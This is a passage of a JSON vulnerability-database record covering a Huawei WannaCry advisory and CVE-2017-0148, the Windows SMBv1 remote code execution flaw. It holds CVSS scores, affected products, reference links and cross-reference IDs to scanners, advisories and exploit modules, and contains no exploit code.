"PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2021-06-08T18:44:26", "rev": 2, "value": 6.1, "vector": "NONE"}}, "hash": "d888425aac868b4ee3209aa5565c0b2560b2a56eb57bda127d801bae85a290c6", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "ab4c23e37edfd222606da2fa8131cc0e", "key": "description"}, {"hash": "1fe6f9c53ed1ec89833f87f45ee6db6f", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "f3f172d109ebf206391628f4241045e7", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b027d2174bf77e8383f5629e4d766f25", "key": "title"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "8951f897adb3ace87288f35228ad9ab7", "key": "href"}, {"hash": "dfc20e0bc935ec49e080ba5d8f3ad837", "key": "modified"}, {"hash": "c1aafc7e23f24ba11aae492f5caa2d97", "key": "type"}, {"hash": "7087ee65c2383d964726bbf1465730fc", "key": "published"}], "history": [], "href": "https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170513-01-windows-en", "id": "HUAWEI-SA-20170513-01-WINDOWS", "immutableFields": [], "lastseen": "2021-06-08T18:44:26", "modified": "2017-05-23T00:00:00", "objectVersion": "1.5", "published": "2017-05-13T00:00:00", "references": [], "reporter": "Huawei Technologies", "title": "Security Advisory - 'WannaCry ransomware' Vulnerabilities in Microsoft Windows Systems", "type": "huawei", "viewCount": 15}, "different_elements": ["cvss3", "cvss2"], "edition": 2, "lastseen": "2021-06-08T18:44:26"}], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "f3f172d109ebf206391628f4241045e7"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "ab4c23e37edfd222606da2fa8131cc0e"}, {"key": "href", "hash": "8951f897adb3ace87288f35228ad9ab7"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "dfc20e0bc935ec49e080ba5d8f3ad837"}, {"key": "published", "hash": "7087ee65c2383d964726bbf1465730fc"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "1fe6f9c53ed1ec89833f87f45ee6db6f"}, {"key": "title", "hash": "b027d2174bf77e8383f5629e4d766f25"}, {"key": "type", "hash": "c1aafc7e23f24ba11aae492f5caa2d97"}], "hash": "81a9bcf0716f949753378d66c0f0703a0f15a8bf0bb1b3dec4ddd0bfe859cc6c", "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-06-08T18:44:26", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-06-08T18:44:26", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "\u25cfe6000 chassis", "operator": "eq", "version": "\u25cfRH2285H V2"}, {"name": "\u25cfbh622 v2", "operator": "eq", "version": "\u25cfHertz-W19"}, {"name": "18800v3", "operator": "eq", "version": "V300R003C10"}, {"name": "\u25cfch240", "operator": "eq", "version": "\u25cfRH2265 V2"}, {"name": "\u25cfes3000", "operator": "eq", "version": ""}, {"name": "oceanstor18500v3", "operator": "eq", "version": "V300R003C10"}, {"name": "\u25cfelog", "operator": "eq", "version": "\u25cfRH2288 V2"}, {"name": "\u25cfch121", "operator": "eq", "version": "\u25cfiNIC"}, {"name": "\u25cfch222", "operator": "eq", "version": "\u25cfRH1288A V2"}, {"name": "\u25cfch242 v3", "operator": "eq", "version": "\u25cfRH2285"}, {"name": "\u25cfch220", "operator": "eq", "version": "\u25cfN2000 Appliance"}, {"name": "\u25cfbh621 v2", "operator": "eq", "version": "\u25cfHertz-W09"}, {"name": "product name", "operator": "eq", "version": "Affected Version"}, {"name": "oceanstor18500", "operator": "eq", "version": "V100R001"}, {"name": "\u25cfbigdata appliance", "operator": "eq", "version": "\u25cfHuawei solutions for SAP HANA"}, {"name": "\u25cfch221", "operator": "eq", "version": "\u25cfRH1288 V2"}, {"name": "\u25cfe6000", "operator": "eq", "version": "\u25cfRH2285 V2"}, {"name": "oceanstor18500v3", "operator": "eq", "version": "V300R003C00"}, {"name": "18800f", "operator": "eq", "version": "V100R001"}, {"name": "18800v3", "operator": "eq", "version": "V300R003C20"}, {"name": "\u25cfch140", "operator": "eq", "version": "\u25cfL2800"}, {"name": "\u25cfbh620 v2", "operator": "eq", "version": "\u25cfFusionAccess"}, {"name": "oceanstor18500v3", "operator": "eq", "version": "V300R003C20"}, {"name": "\u25cfch242", "operator": "eq", "version": "\u25cfRH2268 V2"}, {"name": "\u25cfbh640 v2", "operator": "eq", "version": "\u25cfHertz-W29"}, {"name": "18800", "operator": "eq", "version": "V100R001"}, {"name": "18800v3", "operator": "eq", "version": "V300R003C00"}], "immutableFields": [], "scheme": null, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}], "cve": [{"id": "CVE-2017-0148", "bulletinFamily": "NVD", "title": "CVE-2017-0148", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "reporter": "secure@microsoft.com", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0148"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-05T13:14:20", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-02-05T13:14:20", "rev": 2, "value": 9.3, "vector": "NONE"}}, "hash": "5da130ba09e2b574b4cbbc13dfeecbae705318fbe1563859a574adcb5b15be09", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "3f9465465d68d8a7f86e1cb1f3804b2c", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6a3356b5136599746533482cee29bc14", "key": "title"}, {"hash": "dc7888ec5bcb36228c71cf6f35f01dee", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a142b7b1b3b74c6f44646072d5968b9a", "key": "description"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "id": "CVE-2017-0148", "lastseen": "2020-02-05T13:14:20", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0148", "type": "cve", "viewCount": 49}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-05T13:14:20"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 9.3, "vector": "NONE"}}, "hash": "4e3af9e59f0d3602ba89af9f55f0afd0c71c41ea86fbee33039047bf3146c1bb", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": 